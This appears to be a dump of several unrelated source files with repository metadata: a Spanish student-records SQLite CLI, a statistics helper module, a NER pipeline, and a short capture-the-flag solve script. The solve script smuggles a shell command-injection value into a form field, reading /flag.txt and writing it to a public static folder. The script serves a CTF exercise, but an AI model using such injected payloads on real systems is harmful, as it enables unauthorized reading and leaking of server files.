# Funcion para cancelar materias
def CancelarMaterias(lector,database):
graficar.Simple()
z = input("Digite el Id del estudiante: ")
lector.execute("SELECT * FROM MATERIASEST WHERE IDEST = ?",(z,))
y = lector.fetchall()
if (len(y) == 0):
ñ = input("El estudiante no tiene ninguna materia inscrita.")
else:
x = 0
w = 14
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
print(" ")
y = input("Digite el codigo de la materia que desea eliminar: ")
while True:
try:
lector.execute("DELETE FROM MATERIASEST WHERE IDEST = ? AND CODIGO = ?",(z,y,))
break
except:
print("Codigo no existente.")
database.commit()
os.system('cls')
# Funcion para modificar un estudiante
def ModificarEstudiante(lector,database):
graficar.Simple()
z = input("Digite el ID del estudiante que desee modificar: ")
lector.execute("SELECT * FROM ESTUDIANTES WHERE ID = ?",(z,))
y = lector.fetchall()
x = 0
w = 6
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
print("")
graficos.MenuEstudiantes()
while True:
try:
a = int(input("¿Que desea modificar del estudiante?"))
break
except:
print("Opcion no valida, digite denuevo.")
if (a == 1):
b = input("Digite el nuevo nombre: ")
lector.execute("UPDATE ESTUDIANTES SET NOMBRE = ? WHERE ID = ? ",(b,z,))
lector.execute("UPDATE MATERIASEST SET NOMEST = ? WHERE IDEST = ?",(b,z,))
if (a == 2):
b = input("Digite el nuevo apellido: ")
lector.execute("UPDATE ESTUDIANTES SET APEST = ? WHERE ID = ? ",(b,z,))
lector.execute("UPDATE MATERIASEST SET APEST = ? WHERE IDEST = ?",(b,z,))
if (a == 3):
b = input("Digite el codigo de la nueva carrera: ")
lector.execute("UPDATE ESTUDIANTES SET CODPDE = ? WHERE ID = ? ",(b,z,))
lector.execute("DELETE FROM MATERIASEST WHERE IDEST = ?",(z,))
if (a == 4):
b = input("Digite el nuevo estado del estudiante: ")
lector.execute("UPDATE ESTUDIANTES SET ESTADO = ? WHERE ID = ? ",(b,z,))
if (a == 5):
pass
database.commit()
os.system('cls')
# Funcion para modificar un profesor
def ModificarProfesor(lector,database):
graficar.Simple()
z = input("Digite el ID del profesor que desee modificar: ")
lector.execute("SELECT * FROM PROFESORES WHERE ID = ?",(z,))
y = lector.fetchall()
x = 0
w = 4
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
print("")
graficos.MenuProfesor()
while True:
try:
a = int(input("¿Que desea modificar del docente?"))
break
except:
print("Opcion no valida, digite denuevo.")
if (a == 1):
b = input("Digite el nuevo nombre: ")
lector.execute("UPDATE PROFESORES SET NOMBRE = ? WHERE ID = ? ",(b,z,))
lector.execute("UPDATE MATERIASDOC SET NOMDOC = ? WHERE ID = ?",(b,z,))
lector.execute("UPDATE MATERIASEST SET NOMDOC = ? WHERE IDEST = ?",(b,z,))
if (a == 2):
b = input("Digite el nuevo apellido: ")
lector.execute("UPDATE PROFESORES SET APELLIDO = ? WHERE ID = ? ",(b,z,))
lector.execute("UPDATE MATERIASDOC SET APDOC = ? WHERE ID = ?",(b,z,))
lector.execute("UPDATE MATERIASEST SET APDOC = ? WHERE IDDOC = ?",(b,z,))
if (a == 3):
b = input("Digite el nuevo estado del docente: ")
lector.execute("UPDATE PROFESORES SET ESTADO = ? WHERE ID = ? ",(b,z,))
lector.execute("DELETE FROM MATERIASDOC WHERE ID = ?",(z,))
lector.execute("DELETE FROM MATERIASEST WHERE IDDOC = ?",(z,))
if (a == 4):
pass
database.commit()
os.system('cls')
# Funcion para modificar una materia
def ModificarMaterias(lector,database):
graficar.Simple()
z = input("Digite el codigo de la materia que desee modificar: ")
lector.execute("SELECT * FROM PROFESORES WHERE ID = ?",(z,))
y = lector.fetchall()
x = 0
w = 14
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
print("")
graficos.MenuMaterias()
while True:
try:
a = int(input("¿Que desea modificar del docente?"))
break
except:
print("Opcion no valida, digite denuevo.")
if (a == 1):
b = input("Digite el nuevo nombre: ")
lector.execute("UPDATE MATERIAS SET NOMBRE = ? WHERE ID = ? ",(b,z,))
lector.execute("UPDATE MATERIASDOC SET NOMBRE = ? WHERE ID = ?",(b,z,))
lector.execute("UPDATE MATERIASEST SET NOMBRE = ? WHERE IDEST = ?",(b,z,))
if (a == 2):
b = int(input("Digite el nuevo numero de creditos: "))
lector.execute("UPDATE MATERIAS SET CREDITOS = ? WHERE ID = ? ",(b,z,))
if (a == 3):
pass
database.commit()
os.system('cls')
# Funcion para eliminar un estudiante
def EliminarEstudiante(lector,database):
graficar.Simple()
while True:
try:
z = input("Digite el ID del estudiante que desea eliminar: ")
lector.execute("SELECT * FROM PROFESORES WHERE ID = ?",(z,))
y = lector.fetchall()
x = 0
w = 4
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
a = input('''
Advertencia: ¿Esta seguro de querer eliminar al usuario del sistema SUN? Toda la informacion se perdera
sin posibilidad de ser recuperada Y||N: ''')
b = input("Escriba la palabra 'Eliminar' para confirmar su ocpion: ")
if(a == "Y" and b == "Eliminar"):
lector.execute("DELETE FROM ESTUDIANTES WHERE ID = ? ",(z,))
lector.execute("DELETE FROM MATERIASEST WHERE IDEST = ? ",(z,))
database.commit()
break
else:
input("Cancelando borrado de datos.")
break
except:
print("Ocurrido un error, por favor digite denuevo")
os.system('cls')
# Funcion para eliminar un profesor
def EliminarProfesor(lector,database):
graficar.Simple()
while True:
try:
z = input("Digite el ID del profesor que desea eliminar: ")
lector.execute("SELECT * FROM PROFESORES WHERE ID = ?",(z,))
y = lector.fetchall()
x = 0
w = 4
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
a = input('''
Advertencia: ¿Esta seguro de querer eliminar al usuario del sistema SUN? Toda la informacion se perdera
sin posibilidad de ser recuperada Y||N: ''')
b = input("Escriba la palabra 'Eliminar' para confirmar su ocpion: ")
if(a == "Y" and b == "Eliminar"):
lector.execute("DELETE FROM PROFESORES WHERE ID = ? ",(z,))
lector.execute("DELETE FROM MATERIASDOC WHERE ID = ? ",(z,))
lector.execute("DELETE FROM MATERIASEST WHERE IDDOC = ? AND ESTATUS 'cursando' ",(z,))
database.commit()
break
else:
input("Cancelando borrado de datos")
break
except:
print("Ocurrido un error, por favor digite denuevo")
os.system('cls')
# Funcion para asinar una nota a los estudiantes
def SubirCalificaciones(lector,database):
graficar.Simple()
z = input("Digite el Id del estudiante: ")
lector.execute("SELECT * FROM MATERIASEST WHERE IDEST = ?",(z,))
y = lector.fetchall()
if (len(y) == 0):
ñ = input("El estudiante no tiene ninguna materia inscrita.")
else:
x = 0
w = 14
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
print(" ")
y = input("Digite el codigo de la materia que desea calificar: ")
while True:
try:
a = int(input("Digite la calificacion de la materia: "))
lector.execute("UPDATE MATERIASEST SET CALIFICACIÓN = ? WHERE IDEST = ? AND CODIGO = ?",(a,z,y,))
''' if a>30:
lector.execute("SELECT CODIGO FROM MATERIASEST WHERE CALIFICACIÓN = ?",(a,))
b = lector.fetchall()
b = ConvertirString(b)
lector.execute("SELECT CODIGO FROM MATERIASEST WHERE CALIFICACIÓN = ?",(a,))
c = lector.fetchall()
c = ConvertirString(c)
materias_aprobada = (b,c)
lector.execute("INSERT INTO MATERIAAPRO (CODMATERIA, IDEST) VALUES = ?,?",materias_aprobada)
database.commit()'''
break
except:
print("Codigo no existente.")
break
database.commit()
os.system('cls')
# Con esta funcion se calcula el PAPA
def CalcularPAPA(lector,database):
graficar.Simple()
z = input("Digite el Id del estudiante: ")
lector.execute("SELECT CODIGO FROM MATERIASEST WHERE IDEST = ?",(z,))
y = lector.fetchall()
y = ConvertirLista(y)
l = []
m = []
for i in y:
lector.execute("SELECT CREDITOS FROM MATERIA WHERE CODIGO = ?",(i,))
a = lector.fetchall()
a = ConvertirNum(a)
m.append(a)
lector.execute("SELECT CALIFICACIÓN FROM MATERIASEST WHERE CODIGO = ? AND IDEST = ? ",(i,z,))
b = lector.fetchall()
b = ConvertirNum(b)
c = b*a
l.append(c)
n = sum(l)
ñ = sum(m)
p = n//ñ
lector.execute("UPDATE ESTUDIANTES SET PAPA = ? WHERE ID = ?",(p,z,))
database.commit()
os.system('cls')
# Con esta funcion mostramos lo que hay en la base de datos
def Mostrar(lector,tabla):
graficar.Simple()
print("")
b = 0
c = "0"
if (tabla == "ESTUDIANTES"):
b = 6
print('''
1.) Nombre
2.) Apellido
3.) ID
4.) PAPA
''')
print("")
d = int(input("Digite el orden que desea: "))
if (d == 1):
c = "NOMBRE"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT * FROM ESTUDIANTES ORDER BY ?",(c,))
if (d == 2):
c = "APELLIDO"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT APELLIDO, NOMBRE, ID, CODPDE, ESTADO, PAPA FROM ESTUDIANTES")
if (d == 3):
c = "ID"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT ID, NOMBRE, APELLIDO, CODPDE, ESTADO, PAPA FROM ESTUDIANTES")
if (d == 4):
c = "PAPA"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT PAPA, NOMBRE, APELLIDO, ID, CODPDE, ESTADO FROM ESTUDIANTES")
elif (tabla == "PROFESORES"):
b = 4
print('''
1.) Nombre
2.) Apellido
3.) ID
''')
print("")
d = int(input("Digite el orden que desea:"))
if (d == 1):
c = "NOMBRE"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT * FROM PROFESORES ORDER BY ?",(c,))
if (d == 2):
c = "APELLIDO"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT APELLIDO, NOMBRE, ID, ESTADO FROM PROFESORES")
if (d == 3):
c = "ID"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT ID, NOMBRE, APELLIDO, ESTADO FROM PROFESORES")
elif (tabla == "MATERIAS"):
b = 7
print('''
1.) Nombre
2.) Codigo
''')
print("")
d = int(input("Digite el orden que desea:"))
if (d == 1):
c = "NOMBRE"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT * FROM MATERIAS ORDER BY ?",(c,))
if (d == 2):
c = "CODIGO"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT CODIGO, NOMBRE, APELLIDO, CODFACULTAD, CODDEPA, CREDITOS, PREREQ, CODPREREQ FROM PROFESORES")
elif (tabla == "MATERIASDOC"):
b = 9
print('''
1.) Nombre de materia
2.) Codigo de materia
3.) Nombre de docente
4.) Apellido de doncente
5.) Id de docente
''')
print("")
d = int(input("Digite el orden que desea:"))
if (d == 1):
c = "NOMBRE"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT NOMBRE, CODIGO, NOMDOC, APDOC, ID, HORARIOINIT, HORASCLASE, DIAS, CUPOS FROM MATERIASDOC")
if (d == 2):
c = "CODIGO"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT CODIGO, NOMBRE, NOMDOC, APDOC, ID, HORARIOINIT, HORASCLASE, DIAS, CUPOS FROM MATERIASDOC")
if (d == 3):
c = "NOMDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT NOMDOC, APDOC, CODIGO, NOMBRE, ID, HORARIOINIT, HORASCLASE, DIAS, CUPOS FROM MATERIASDOC")
if (d == 4):
c = "APDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT APDOC, NOMDOC, CODIGO, NOMBRE, ID, HORARIOINIT, HORASCLASE, DIAS, CUPOS FROM MATERIASDOC")
if (d == 5):
c = "IDDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT ID, APDOC, NOMDOC, CODIGO, NOMBRE, HORARIOINIT, HORASCLASE, DIAS, CUPOS FROM MATERIASDOC")
elif (tabla == "MATERIASEST"):
b = 14
print('''
1.) Id estudiante
2.) Codigo de materia
''')
print("")
d = int(input("Digite el orden que desea:"))
if (d == 1):
c = "NOMBRE"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT IDEST, CODIGO FROM MATERIASEST")
if (d == 2):
c = "CODIGO"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT CODIGO, IDEST FROM MATERIASEST")
if (d == 3):
c = "NOMDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT NOMDOC, APDOC, IDDOC, NOMBRE, CODIGO, NOMEST, APEST, IDEST, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
if (d == 4):
c = "APDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT APDOC, NOMDOC, IDDOC, NOMBRE, CODIGO, NOMEST, APEST, IDEST, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
if (d == 5):
c = "NOMEST"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT NOMEST, APEST, IDEST, NOMBRE, CODIGO, NOMDOC, APDOC, IDDOC, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
if (d == 6):
c = "APEST"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT APEST, NOMEST, NOMBRE, CODIGO, IDEST, IDDOC, NOMDOC, APDOC, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
if (d == 7):
c = "IDDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT IDDOC, NOMDOC, NOMBRE, CODIGO, IDEST, NOMEST, APEST, APDOC, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
if (d == 8):
c = "IDEST"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT IDEST, NOMEST, APEST, NOMBRE, CODIGO, IDDOC, NOMDOC, APDOC, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
a = lector.fetchall()
k = 0
for i in range(len(a)):
for j in a[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
wait = input()
os.system('cls')
def BuscarEstudiante(lector,database):
graficar.Simple()
print("")
print('''
1.) Nombre
2.) Apellido
3.) Id
4.) PAPA
''')
print("")
d = []
a = int(input("Digite la opcion de busqueda: "))
if(a == 1):
c = input("Digite el nombre del estudiante: ")
lector.execute("SELECT * FROM ESTUDIANTES WHERE NOMBRE = ?",(c,))
d = lector.fetchall()
graficos.ImprimirTabla("ESTUDIANTES")
if (a == 2):
c = input("Digite el Apellido del estudainte: ")
lector.execute("SELECT * FROM ESTUDIANTES WHERE APELLIDO = ?",(c,))
d = lector.fetchall()
graficos.ImprimirTabla("ESTUDIANTES")
if (a == 3):
c = int(input("Digite el Id del estudiante: "))
lector.execute("SELECT * FROM ESTUDIANTES WHERE ID = ?",(c,))
d = lector.fetchall()
graficos.ImprimirTabla("ESTUDIANTES")
if (a == 4):
c = int(input("Digite el PAPA del estudiante: "))
lector.execute("SELECT * FROM ESTUDIANTES WHERE PAPA = ?",(c,))
d = lector.fetchall()
graficos.ImprimirTabla("ESTUDIANTES")
b = 6
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
wait = input()
os.system('cls')
def BuscarProfesor(lector,database):
graficar.Simple()
print("")
print('''
1.) Nombre
2.) Apellido
3.) Id
''')
print("")
a = int(input("Digite la opcion de busqueda: "))
d = []
if(a == 1):
c = input("Digite el nombre del Profesor: ")
lector.execute("SELECT * FROM PROFESORES WHERE NOMBRE = ?",(c,))
graficos.ImprimirTabla("PROFESORES")
d = lector.fetchall()
b = 4
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
if(a == 2):
c = input("Digite el apellido del Profesor: ")
lector.execute("SELECT * FROM PROFESORES WHERE APELLIDO = ?",(c,))
graficos.ImprimirTabla("PROFESORES")
d = lector.fetchall()
b = 4
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
if(a == 3):
c = int(input("Digite el Id del Profesor: "))
lector.execute("SELECT * FROM PROFESORES WHERE ID = ?",(c,))
graficos.ImprimirTabla("PROFESORES")
d = lector.fetchall()
b = 4
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
wait = input()
os.system('cls')
def BuscarMateria(lector,database):
graficar.Simple()
print("")
print('''
1.) Nombre
2.) Codigo
''')
print("")
a = int(input("Digite la opcion de busqueda: "))
d = []
if(a == 1):
c = input("Digite el nombre de la materia: ")
lector.execute("SELECT * FROM MATERIAS WHERE NOMBRE = ?",(c,))
graficos.ImprimirTabla("MATERIAS")
d = lector.fetchall()
b = 6
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
if(a == 2):
c = input("Digite el codigo de la materia: ")
lector.execute("SELECT * FROM MATERIAS WHERE CODIGO = ?",(c,))
graficos.ImprimirTabla("MATERIAS")
d = lector.fetchall()
b = 6
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
wait = input()
os.system('cls')
def ConvertirString(lista):
tupla = lista[0]
str = ''.join(tupla)
return str
def ConvertirNum(lista):
tupla = lista[0]
num = int(''.join(map(str, tupla)))
return num
def ConvertirLista(lista):
nueva_lista=[]
for i in lista:
tupla = i
a = ''.join(tupla)
nueva_lista.append(a)
return nueva_lista
def ConvertirListaNum(lista):
nueva_lista=[]
for i in lista:
tupla = i
a = int(''.join(map(str, tupla)))
nueva_lista.append(a)
return nueva_lista
| 39.318075 | 156 | 0.488253 |
b819e906573d2d2a62c515e19022b5d99c4d0576
| 6,698 |
py
|
Python
|
jburt/stats.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
jburt/stats.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
jburt/stats.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
from typing import Collection
from typing import Tuple
import numpy as np
from scipy import special as special
from scipy.stats import pearsonr
from scipy.stats import rankdata
from jburt.mask import mask_nan
def nonparp(stat: float, null_dist: Collection) -> float:
"""
Compute two-sided non-parametric p-value.
Compute the fraction of elements in `dist` which are more extreme than
`stat`.
Parameters
----------
stat : float
test statistic
null_dist : Collection
samples from null distribution
Returns
-------
float
Fraction of elements in `dist` which are more extreme than `stat`
"""
n = float(len(null_dist))
return np.sum(np.abs(null_dist) > abs(stat)) / n
def abs_pearson(x: np.ndarray, y: np.ndarray) -> float:
"""
Compute absolute value of Pearson correlation coefficient.
Parameters
----------
x : (N,) np.ndarray
y : (N,) np.ndarray
Returns
-------
r : float
absolute value of correlation
"""
return abs(pearsonr(x, y)[0])
def pearsonr_multi(X: np.ndarray, Y: np.ndarray) -> np.ndarray:
"""
Multi-dimensional Pearson correlation between rows of `X` and `Y`.
Parameters
----------
X : (N,P) np.ndarray
Y : (M,P) np.ndarray
Returns
-------
(N,M) np.ndarray
Raises
------
TypeError : `X` or `Y` is not array_like
ValueError : `X` and `Y` are not same size along second axis
"""
if not isinstance(X, np.ndarray) or not isinstance(Y, np.ndarray):
raise TypeError('X and Y must be numpy arrays')
if X.ndim == 1:
X = X.reshape(1, -1)
if Y.ndim == 1:
Y = Y.reshape(1, -1)
n = X.shape[1]
if n != Y.shape[1]:
raise ValueError('X and Y must be same size along axis=1')
mu_x = X.mean(axis=1)
mu_y = Y.mean(axis=1)
s_x = X.std(axis=1, ddof=n - 1)
s_y = Y.std(axis=1, ddof=n - 1)
cov = np.dot(X, Y.T) - n * np.dot(
mu_x[:, np.newaxis], mu_y[np.newaxis, :])
return cov / np.dot(s_x[:, np.newaxis], s_y[np.newaxis, :])
def spearmanr_multi(X: np.ndarray, Y: np.ndarray) -> np.ndarray:
"""
Multi-dimensional Spearman rank correlation between rows of `X` and `Y`.
Parameters
----------
X : (N,P) np.ndarray
Y : (M,P) np.ndarray
Returns
-------
(N,M) np.ndarray
Raises
------
TypeError : `X` or `Y` is not array_like
ValueError : `X` and `Y` are not same size along second axis
Notes
-----
Spearman rank correlation is equivalent to performing pearson correlation on
ranks.
"""
return pearsonr_multi(rankdata(X, axis=1), rankdata(Y, axis=1))
def pairwise_r(X: np.ndarray, flatten: bool = False) -> np.ndarray:
"""
Compute pairwise Pearson's r between rows of `X`.
Parameters
----------
X : (N,M) np.ndarray
N rows each with M numeric elements
flatten : bool, default False
If True, return flattened upper triangular elements of corr. matrix
Returns
-------
(N*(N-1)/2,) or (N,N) np.ndarray
Pearson correlation coefficients
"""
rp = pearsonr_multi(X, X)
if not flatten:
return rp
triu_inds = np.triu_indices_from(rp, k=1)
return rp[triu_inds].flatten()
def pairwise_rho(X: np.ndarray, flatten: bool = False) -> np.ndarray:
"""
Compute pairwise Spearman's rho between rows of `X`.
Parameters
----------
X : (N,M) np.ndarray
N rows each with M numeric elements
flatten : bool, default False
If True, return flattened upper triangular elements of corr. matrix
Returns
-------
(N*(N-1)/2,) or (N,N) np.ndarray
Pearson correlation coefficients
"""
rp = spearmanr_multi(X, X)
if not flatten:
return rp
triu_inds = np.triu_indices_from(rp, k=1)
return rp[triu_inds].flatten()
def wmean(x: np.ndarray, w: np.ndarray) -> float:
"""
Compute weighted mean of an array.
Parameters
----------
x : (N,) np.ndarray
scalar array
w : (N,) np.ndarray
weight for each element of ``x``
Returns
-------
float
weighted mean
"""
return np.sum(w * x) / np.sum(w)
def wcov(x: np.ndarray, y: np.ndarray, w: np.ndarray) -> float:
"""
Compute weighted covariance between two arrays.
Parameters
----------
x : (N,) np.ndarray
scalar array
y : (N,) np.ndarray
scalar array
w : (N,) np.ndarray
weights
Returns
-------
float
weighted covariance
"""
assert x.size == y.size
assert x.size == w.size
return np.sum(w * (x - wmean(x, w)) * (y - wmean(y, w))) / np.sum(w)
def wcorr(x: np.ndarray, y: np.ndarray, w: np.ndarray) -> float:
"""
Compute weighted correlation between two arrays.
Parameters
----------
x : (N,) np.ndarray
scalar array
y : (N,) np.ndarray
scalar array
w : (N,) np.ndarray
weights
Returns
-------
float
weighted correlation
"""
return wcov(x, y, w) / np.sqrt(wcov(x, x, w) * wcov(y, y, w))
def p_2tailed(r: float, n: int) -> float:
"""
Compute 2-tailed p-value.
Parameters
----------
r : float
correlation coefficient
n : int
degrees of freedom (length of vector used to compute ``r``)
Returns
-------
float
two-tailed p-value
Notes
-----
Code adapted from scipy.stats.pearsonr
"""
r = max(min(r, 1.0), -1.0)
df = n - 2
if abs(r) == 1.0:
prob = 0.0
else:
t_squared = r ** 2 * (df / ((1.0 - r) * (1.0 + r)))
prob = special.betainc(0.5 * df, 0.5, df / (df + t_squared))
return prob
def pearsonr_weighted(
x: np.ndarray,
y: np.ndarray,
w: np.ndarray = None
) -> Tuple[float]:
"""
Compute the weighted Pearson correlation coefficient.
Parameters
----------
x : (N,) np.ndarray
scalar array
y : (N,) np.ndarray
scalar array
w : (N,) np.ndarray
weights
Returns
-------
r : float
weighted Pearson correlation coefficient
p : float
two-tailed p-value
"""
assert type(x) == type(y) == np.ndarray
assert x.size == y.size
if w is None:
x, y = mask_nan([x, y])
return pearsonr(x, y)
else:
assert type(w) == np.ndarray and w.size == x.size
x, y, w = mask_nan([x, y, w])
n = x.size
if np.isnan(w).all():
return np.nan, np.nan
r = wcorr(x, y, w)
p = p_2tailed(r, n)
return r, p
| 21.888889 | 80 | 0.556285 |
c57173826fa48d31e78f1fb9f148774bcb2fdfc2
| 269 |
py
|
Python
|
web/web-lemonthinker/solve.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | 2 |
2021-08-09T17:08:12.000Z
|
2021-08-09T17:08:17.000Z
|
web/web-lemonthinker/solve.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | null | null | null |
web/web-lemonthinker/solve.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | 1 |
2021-10-09T16:51:56.000Z
|
2021-10-09T16:51:56.000Z
|
import requests
import sys
import random
url = sys.argv[1]
filename = str(random.randrange(1000))
requests.post(url+"generate", {"text":f"$(echo \"$(cat /flag.txt)\" > /app/static/images/{filename})"})
r = requests.get(url + "static/images/" + filename)
print(r.text)
| 26.9 | 103 | 0.69145 |
3dc90459e1406bb5c14b2c1036225c9acf9f53f7
| 4,896 |
py
|
Python
|
Apps/Model Evaluation/ner_pipeline.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | 1 |
2021-04-13T10:00:46.000Z
|
2021-04-13T10:00:46.000Z
|
Apps/Model Evaluation/ner_pipeline.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | null | null | null |
Apps/Model Evaluation/ner_pipeline.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | null | null | null |
#!/usr/local/bin/python3.5
# -*- coding: utf-8 -*-
# import python libs
import nltk
import pickle
import json
from nltk import Tree
from pprint import pprint as pp
from nltk.chunk.api import ChunkParserI
from os import listdir
from os.path import isfile, join
# import project libs
# import nltk_tree_converter
import maxent_chunker
# defining globals & constants
POS_TAGGER_PATH = 'nltk_german_pos_classifier_data.pickle'
CHUNKER_PICKLE_NAME = 'self_trained_ne_chunker_multiclass.pickle'
TEXT_SET = 'NER-de-train'
global german_pos_tagger, self_trained_chunker
german_pos_tagger = False
self_trained_chunker = False
# methods
def ner_pipeline(raw_sentence):
print('NER pipeline: tokenizing / tagging / chunking / converting ...')
# create a lists of strings
tokenized_sentence = word_tokenization(raw_sentence)
# create a list of nltk trees containing named entity chunks
chunk_tree = named_entity_token_chunking(tokenized_sentence)
# convert NLTKs tree format to Hannes' JSON
hannes_json = tree_to_sentence(chunk_tree)
return hannes_json
def word_tokenization(sentence):
return nltk.word_tokenize(sentence)
def part_of_speech_tagging(sentence):
global german_pos_tagger
if not german_pos_tagger:
with open(POS_TAGGER_PATH, 'rb') as f:
german_pos_tagger = pickle.load(f)
return german_pos_tagger.tag(sentence)
def named_entity_token_chunking(tokenized_sentence):
global self_trained_chunker
if not self_trained_chunker:
with open(CHUNKER_PICKLE_NAME, 'rb') as f:
self_trained_chunker = pickle.load(f)
return self_trained_chunker.parse(tokenized_sentence)
def tree_to_sentence(tree):
sentence = []
def add_token_from(node):
token = {
'term': node[0]
}
sentence.append(token)
def add_tokens_from(tree):
length = len(tree)
token = {
'term': tree[0][0],
'annotation': {
'label': annotation_label(tree),
'length': length
}
}
sentence.append(token)
if length > 1:
for node_index in range(1, length):
add_token_from(tree[node_index])
def annotation_label(node):
return node.label()
for node in tree:
if type(node) is Tree:
add_tokens_from(node)
else:
add_token_from(node)
return sentence
# helper
def read_corpus_files(path):
corpus = []
for file_name in sorted(listdir(path)):
file_path = join(path, file_name)
if not (isfile(file_path) and (file_name.endswith('.json') or file_name.endswith('.txt'))): continue
file_handler = open(path + file_name, 'r', encoding='utf-8')
raw_content = file_handler.read()
file_handler.close()
print("processing contents of file %s" % (file_name))
deconded_content = json.JSONDecoder().decode(raw_content)
text_content = deconded_content['content']
for paragraph in text_content:
for sentence in paragraph:
corpus.append(sentence)
return corpus
def sentences_to_tree(paragraph, tree_with_entities = Tree('S', [])):
skip_count = 0
for sentence in paragraph:
for index, token in enumerate(sentence):
if skip_count > 0:
skip_count = skip_count - 1
continue
if 'annotation' in token:
annotation = token['annotation']
if annotation['label'] == 'NAE':
logging.info('nltk_tree_converter.sentences_to_tree: skipping NAE label')
continue
length = annotation['length']
sub_tree = Tree(annotation['label'], [token['term']])
if length > 1:
skip_count = length - 1
for next_index in range((index + 1), (index + length)):
word = sentence[next_index]['term']
sub_tree.append(word)
tree_with_entities.append(sub_tree)
else:
tree_with_entities.extend([token['term']])
return tree_with_entities
def train_maxent_chunker():
print('loading...')
with open('training/germeval/' + TEXT_SET + '.pickle', 'rb') as f:
germ_eval_corpus = pickle.load(f)
print('start training...')
self_trained_chunker = maxent_chunker.NEChunkParser(germ_eval_corpus)
print('Saving chunker to %s...' % CHUNKER_PICKLE_NAME)
with open(CHUNKER_PICKLE_NAME, 'wb') as outfile:
pickle.dump(self_trained_chunker, outfile, -1)
def train_maxent_chunker_with(training_set):
print('start training...')
return maxent_chunker.NEChunkParser(training_set)
# entry point as a stand alone script
if __name__ == '__main__':
train_maxent_chunker()
| 27.977143 | 108 | 0.644199 |
9a71cd07405dfc222cb51425aa64f01e5cd69105
| 7,430 |
py
|
Python
|
official/cv/shufflenetv2/src/shufflenetv2.py
|
leelige/mindspore
|
